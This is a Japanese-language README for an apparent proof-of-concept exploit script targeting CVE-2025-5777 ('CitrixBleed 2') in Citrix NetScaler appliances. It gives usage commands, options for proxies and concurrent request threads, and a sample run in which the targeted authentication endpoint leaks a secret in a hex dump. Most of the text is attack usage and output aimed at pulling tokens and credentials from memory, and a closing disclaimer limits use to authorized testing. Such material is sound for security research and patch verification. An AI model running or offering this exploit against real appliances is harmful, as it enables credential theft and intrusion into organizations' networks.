このスクリプトは、Citrix NetScaler ADC/Gateway アプライアンスの深刻なメモリ情報漏洩脆弱性(CVE-2025-5777、通称 CitrixBleed 2)を悪用します。/p/u/doAuthentication.do エンドポイントを介してメモリリークをトリガーし、XML フラグメント、トークン、場合によっては資格情報などの機密データを含む未初期化メモリを露出させます。
aiohttp による非同期aiohttp, coloramaasyncio + aiohttp を使用した非同期大量リクエストエンジン<InitialValue> メモリリークの自動検出python3 CVE-2025-5777.py http://<target> [options]
| オプション | 説明 |
|---|---|
-v, --verbose | 詳細なデバッグ出力を有効にする |
-p <proxy> | HTTPプロキシを使用する(例: http://127.0.0.1:8080) |
-t <threads> | 並行リクエスト数(デフォルト: 10) |
python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5
_____________ _______________ _______________ ________ .________ .___________________________________
\_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \ | ____/ | ____/\______ \______ \______ \
/ \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ |____ \ ______ |____ \ / / / / / /
\ \____\ / | \ /_____/ / \ \_/ \/ \ / \ /_____/ / \ / / / / / /
\______ / \___/ /_______ / \_______ \_____ /\_______ \/______ / /______ / /____/ /____/ /____/
\/ \/ \/ \/ \/ \/ \/
Citrix NetScaler メモリリーク PoC (CVE-2025-5777)
作者: 0xgh057r3c0n
[🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Status: 200
[✔️ ] InitialValue メモリリークを発見!
[🧠] 16進ダンプ:
------------------------------------------------------------------------
00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21 secret="abcd123!
00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74 @#$%^&*()"</Init
00000020: 69 61 6c 56 61 6c 75 65 3e ialValue>
------------------------------------------------------------------------
[✔️ ] リーク確認。抽出を続行...
この概念実証は教育目的および許可されたセキュリティテストのみを対象としています。 所有していないシステムへの無断スキャンや悪用は違法です。